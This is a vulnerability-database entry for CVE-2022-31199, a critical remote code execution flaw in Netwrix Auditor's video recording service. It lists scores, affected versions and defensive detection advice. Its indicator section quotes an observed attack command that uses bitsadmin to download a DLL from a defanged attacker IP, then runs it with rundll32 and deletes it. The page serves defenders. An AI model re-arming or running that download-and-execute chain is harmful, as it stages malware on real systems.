cbcvebase.
CVE-2022-31199
published 2022-11-08

CVE-2022-31199: Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-08-01
Exploited in the wild
EPSS
36.15%
98.3th percentile
Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.

Affected

1 ranges
VendorProductVersion rangeFixed in
netwrixauditor< 10.510.5

Detection & IOCsextracted from sources · hover to see the quote

ip179.60.150.53
urlhxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
pathc:\ProgramData\msruntime.dll
filenamemsruntime.dll
port9004/TCP
commandC:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll
processUAVRServer.exe
  • Monitor UAVRServer.exe for spawning cmd.exe or bitsadmin child processes, which indicates exploitation of CVE-2022-31199 and subsequent Truebot payload staging.
  • Alert on bitsadmin transfers initiated by UAVRServer.exe dropping DLLs into C:\ProgramData\ followed by rundll32 execution — the observed post-exploitation pattern for this CVE.
  • Block or alert on inbound connections to TCP port 9004 from untrusted sources; this is the vulnerable .NET remoting service port exploited by CVE-2022-31199.
  • ·The vulnerable .NET remoting service (port 9004/TCP) is typically not internet-exposed; exploitation is most likely from an attacker already on the internal network or in cases where the Netwrix server is directly internet-facing with no firewall.
  • ·Exploitation grants NT AUTHORITY\SYSTEM privileges and, because Netwrix Auditor typically runs with extensive AD privileges, successful exploitation likely leads to full Active Directory domain compromise.
  • ·The vulnerability is an insecure .NET object deserialization issue via an unsecured .NET remoting service; arbitrary objects can be submitted to achieve RCE.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.